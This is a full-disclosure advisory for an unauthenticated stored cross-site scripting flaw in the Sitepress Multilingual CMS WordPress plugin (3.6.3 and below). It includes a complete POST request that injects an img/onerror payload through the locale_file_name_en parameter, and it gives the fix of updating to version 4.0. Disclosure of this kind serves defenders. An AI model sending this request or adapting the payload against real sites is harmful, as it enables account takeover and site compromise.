Sitepress Multilingual 3.6.3 Cross Site Scripting

`## FULL DISCLOSURE  
  
#Product : Sitepress Multilingual CMS Plugin  
#Exploit Author : Rahul Pratap Singh  
#Version : 3.6.3 and Below  
#Home page Link : https://wpml.org/  
#Website: https://0x62626262.wordpress.com  
#Date : 08/10/2018  
  
Unauthenticated Stored XSS Vulnerability:  
  
aaaaaaaaaaaaa-  
Description:  
aaaaaaaaaaaaa-  
alocale_file_name_ena parameter is not sanitized that leads to stored XSS.  
  
aaaaaaaaaaaaa  
Vulnerable Code:  
aaaaaaaaaaaaa  
https://0x62626262.files.wordpress.com/2018/09/vulnerable_code.png  
  
aaaaaaaaaaaaa  
Exploit:  
aaaaaaaaaaaaa  
Send the following POST request:  
  
POST  
/wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php  
HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101  
Firefox/56.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 90  
Cookie: wordpress_test_cookie=WP+Cookie+check  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
icl_post_action=save_theme_localization&locale_file_name_en=a><img src=x  
onerror=alert(1)>  
  
aaaaaaaaaaaaa  
POC:  
aaaaaaaaaaaaa  
https://youtu.be/dKmUEqNiMUY  
  
Fix:  
Update to version 4.0  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author.  
The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
`